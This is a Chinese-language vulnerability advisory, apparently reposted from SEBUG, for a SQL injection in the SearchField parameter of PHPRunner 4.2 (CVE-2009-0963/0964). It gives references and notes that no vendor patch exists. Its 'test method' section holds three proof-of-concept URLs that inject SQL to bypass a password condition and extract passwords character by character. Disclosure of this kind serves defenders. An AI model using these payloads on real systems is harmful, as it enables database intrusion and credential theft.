PHPRunner SearchField参数SQL注入漏洞

影响版本:XLineSoft PHPRunner 4.2漏洞描述:BUGTRAQ  ID: 34146CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964 PHPRunner是一款PHP网页制作工具,可以生成读写MySql数据库的PHP网页。 PHPRunner的or...

影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ  ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964

PHPRunner是一款PHP网页制作工具,可以生成读写MySql数据库的PHP网页。

PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考 
http://secunia.com/advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:

XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xlinesoft.com/.
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like   \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--


  • 发表于 2021-05-01 08:49
  • 阅读 ( 372 )
  • 分类:互联网

0 条评论

请先 登录 后评论
腾龙杨阳
腾龙杨阳

697 篇文章

你可能感兴趣的文章

相关问题